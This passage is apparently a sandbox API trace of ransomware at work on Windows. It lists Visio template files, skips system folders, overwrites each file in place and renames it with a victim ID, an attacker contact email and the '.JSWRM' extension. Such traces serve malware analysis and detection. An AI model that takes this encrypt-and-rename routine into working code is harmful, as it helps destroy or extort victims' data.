WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0146.670] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0146.670] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\COMOLE_U.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\comole_u.vstx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0146.671] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=19532) returned 1 [0146.671] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.671] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x4c40, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x4c40, lpOverlapped=0x0) returned 1 [0146.674] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.674] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x4c40, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x4c40, lpOverlapped=0x0) returned 1 [0146.674] CloseHandle (hObject=0x314) returned 1 [0146.674] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\COMOLE_U.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\comole_u.vstx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\COMOLE_U.VSTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\comole_u.vstx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0146.675] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x19fdec5, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x19fdec5, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x1a4a3b4, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xd682, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="COMPLN_M.VSSX", cAlternateFileName="COMPLN~1.VSS")) returned 1 [0146.677] lstrcmpiW (lpString1="COMPLN_M.VSSX", lpString2=".") returned 1 [0146.677] lstrcmpiW (lpString1="COMPLN_M.VSSX", lpString2="..") returned 1 [0146.677] lstrcmpiW (lpString1="COMPLN_M.VSSX", lpString2="...") returned 1 [0146.677] lstrcmpiW (lpString1="COMPLN_M.VSSX", lpString2="windows") returned -1 [0146.678] lstrcmpiW (lpString1="COMPLN_M.VSSX", lpString2="recovery") returned -1 [0146.678] lstrcmpiW (lpString1="COMPLN_M.VSSX", lpString2="perflogs") returned -1 [0146.678] lstrcmpiW (lpString1="COMPLN_M.VSSX", lpString2="documents and settings") returned -1 [0146.678] lstrcmpiW (lpString1="COMPLN_M.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0146.678] lstrcmpiW (lpString1="COMPLN_M.VSSX", lpString2="system volume information") returned -1 [0146.678] lstrcmpiW (lpString1="COMPLN_M.VSSX", lpString2="msocache") returned -1 [0146.678] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="COMPLN_M.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0146.678] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="COMPLN_M.VSSX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="COMPLN_M.VSSX", lpUsedDefaultChar=0x0) returned 13 [0146.678] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="COMPLN_M.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0146.678] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="COMPLN_M.VSSX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="COMPLN_M.VSSX", lpUsedDefaultChar=0x0) returned 13 [0146.678] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0146.678] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0146.678] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\COMPLN_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\compln_m.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0146.680] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=54914) returned 1 [0146.680] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.680] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0xd680, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0xd680, lpOverlapped=0x0) returned 1 [0146.685] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.685] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xd680, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0xd680, lpOverlapped=0x0) returned 1 [0146.686] CloseHandle (hObject=0x314) returned 1 [0146.686] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\COMPLN_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\compln_m.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\COMPLN_M.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\compln_m.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0146.687] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1cac944, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1cac944, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x1cac944, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xd595, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="COMPLN_U.VSSX", cAlternateFileName="COMPLN~2.VSS")) returned 1 [0146.687] lstrcmpiW (lpString1="COMPLN_U.VSSX", lpString2=".") returned 1 [0146.687] lstrcmpiW (lpString1="COMPLN_U.VSSX", lpString2="..") returned 1 [0146.687] lstrcmpiW (lpString1="COMPLN_U.VSSX", lpString2="...") returned 1 [0146.687] lstrcmpiW (lpString1="COMPLN_U.VSSX", lpString2="windows") returned -1 [0146.687] lstrcmpiW (lpString1="COMPLN_U.VSSX", lpString2="recovery") returned -1 [0146.687] lstrcmpiW (lpString1="COMPLN_U.VSSX", lpString2="perflogs") returned -1 [0146.687] lstrcmpiW (lpString1="COMPLN_U.VSSX", lpString2="documents and settings") returned -1 [0146.687] lstrcmpiW (lpString1="COMPLN_U.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0146.687] lstrcmpiW (lpString1="COMPLN_U.VSSX", lpString2="system volume information") returned -1 [0146.687] lstrcmpiW (lpString1="COMPLN_U.VSSX", lpString2="msocache") returned -1 [0146.687] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="COMPLN_U.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0146.687] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="COMPLN_U.VSSX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="COMPLN_U.VSSX", lpUsedDefaultChar=0x0) returned 13 [0146.687] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="COMPLN_U.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0146.687] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="COMPLN_U.VSSX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="COMPLN_U.VSSX", lpUsedDefaultChar=0x0) returned 13 [0146.687] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0146.687] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0146.687] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\COMPLN_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\compln_u.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0146.688] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=54677) returned 1 [0146.688] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.688] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0xd590, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0xd590, lpOverlapped=0x0) returned 1 [0146.693] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.693] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xd590, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0xd590, lpOverlapped=0x0) returned 1 [0146.694] CloseHandle (hObject=0x314) returned 1 [0146.694] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\COMPLN_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\compln_u.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\COMPLN_U.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\compln_u.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0146.695] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1cac944, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1cac944, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x1cac944, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x104d5, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="COMPME_M.VSSX", cAlternateFileName="COMPME~2.VSS")) returned 1 [0146.695] lstrcmpiW (lpString1="COMPME_M.VSSX", lpString2=".") returned 1 [0146.695] lstrcmpiW (lpString1="COMPME_M.VSSX", lpString2="..") returned 1 [0146.695] lstrcmpiW (lpString1="COMPME_M.VSSX", lpString2="...") returned 1 [0146.696] lstrcmpiW (lpString1="COMPME_M.VSSX", lpString2="windows") returned -1 [0146.696] lstrcmpiW (lpString1="COMPME_M.VSSX", lpString2="recovery") returned -1 [0146.696] lstrcmpiW (lpString1="COMPME_M.VSSX", lpString2="perflogs") returned -1 [0146.696] lstrcmpiW (lpString1="COMPME_M.VSSX", lpString2="documents and settings") returned -1 [0146.696] lstrcmpiW (lpString1="COMPME_M.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0146.696] lstrcmpiW (lpString1="COMPME_M.VSSX", lpString2="system volume information") returned -1 [0146.696] lstrcmpiW (lpString1="COMPME_M.VSSX", lpString2="msocache") returned -1 [0146.696] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="COMPME_M.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0146.696] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="COMPME_M.VSSX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="COMPME_M.VSSX", lpUsedDefaultChar=0x0) returned 13 [0146.696] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="COMPME_M.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0146.696] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="COMPME_M.VSSX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="COMPME_M.VSSX", lpUsedDefaultChar=0x0) returned 13 [0146.696] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0146.696] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0146.696] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\COMPME_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\compme_m.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0146.697] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=66773) returned 1 [0146.697] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.697] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x104d0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x104d0, lpOverlapped=0x0) returned 1 [0146.704] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.704] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x104d0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x104d0, lpOverlapped=0x0) returned 1 [0146.705] CloseHandle (hObject=0x314) returned 1 [0146.705] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\COMPME_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\compme_m.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\COMPME_M.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\compme_m.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0146.706] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1b2f0f8, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1b2f0f8, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x1b2f0f8, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xfebb, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="COMPME_U.VSSX", cAlternateFileName="COMPME~1.VSS")) returned 1 [0146.706] lstrcmpiW (lpString1="COMPME_U.VSSX", lpString2=".") returned 1 [0146.706] lstrcmpiW (lpString1="COMPME_U.VSSX", lpString2="..") returned 1 [0146.706] lstrcmpiW (lpString1="COMPME_U.VSSX", lpString2="...") returned 1 [0146.706] lstrcmpiW (lpString1="COMPME_U.VSSX", lpString2="windows") returned -1 [0146.706] lstrcmpiW (lpString1="COMPME_U.VSSX", lpString2="recovery") returned -1 [0146.706] lstrcmpiW (lpString1="COMPME_U.VSSX", lpString2="perflogs") returned -1 [0146.706] lstrcmpiW (lpString1="COMPME_U.VSSX", lpString2="documents and settings") returned -1 [0146.706] lstrcmpiW (lpString1="COMPME_U.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0146.706] lstrcmpiW (lpString1="COMPME_U.VSSX", lpString2="system volume information") returned -1 [0146.706] lstrcmpiW (lpString1="COMPME_U.VSSX", lpString2="msocache") returned -1 [0146.706] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="COMPME_U.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0146.706] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="COMPME_U.VSSX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="COMPME_U.VSSX", lpUsedDefaultChar=0x0) returned 13 [0146.706] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="COMPME_U.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0146.706] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="COMPME_U.VSSX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="COMPME_U.VSSX", lpUsedDefaultChar=0x0) returned 13 [0146.706] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0146.706] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0146.706] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\COMPME_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\compme_u.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0146.710] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=65211) returned 1 [0146.710] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.710] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0xfeb0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0xfeb0, lpOverlapped=0x0) returned 1 [0146.716] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.716] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xfeb0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0xfeb0, lpOverlapped=0x0) returned 1 [0146.716] CloseHandle (hObject=0x314) returned 1 [0146.716] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\COMPME_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\compme_u.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\COMPME_U.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\compme_u.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0146.717] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x290acd1, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x290acd1, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x2930e76, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x2d930, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="COMPS_M.VSSX", cAlternateFileName="COMPS_~2.VSS")) returned 1 [0146.717] lstrcmpiW (lpString1="COMPS_M.VSSX", lpString2=".") returned 1 [0146.717] lstrcmpiW (lpString1="COMPS_M.VSSX", lpString2="..") returned 1 [0146.717] lstrcmpiW (lpString1="COMPS_M.VSSX", lpString2="...") returned 1 [0146.717] lstrcmpiW (lpString1="COMPS_M.VSSX", lpString2="windows") returned -1 [0146.718] lstrcmpiW (lpString1="COMPS_M.VSSX", lpString2="recovery") returned -1 [0146.718] lstrcmpiW (lpString1="COMPS_M.VSSX", lpString2="perflogs") returned -1 [0146.718] lstrcmpiW (lpString1="COMPS_M.VSSX", lpString2="documents and settings") returned -1 [0146.718] lstrcmpiW (lpString1="COMPS_M.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0146.718] lstrcmpiW (lpString1="COMPS_M.VSSX", lpString2="system volume information") returned -1 [0146.718] lstrcmpiW (lpString1="COMPS_M.VSSX", lpString2="msocache") returned -1 [0146.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="COMPS_M.VSSX", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0146.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="COMPS_M.VSSX", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="COMPS_M.VSSX", lpUsedDefaultChar=0x0) returned 12 [0146.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="COMPS_M.VSSX", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0146.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="COMPS_M.VSSX", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="COMPS_M.VSSX", lpUsedDefaultChar=0x0) returned 12 [0146.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0146.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0146.718] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\COMPS_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\comps_m.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0146.719] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=186672) returned 1 [0146.719] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.719] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 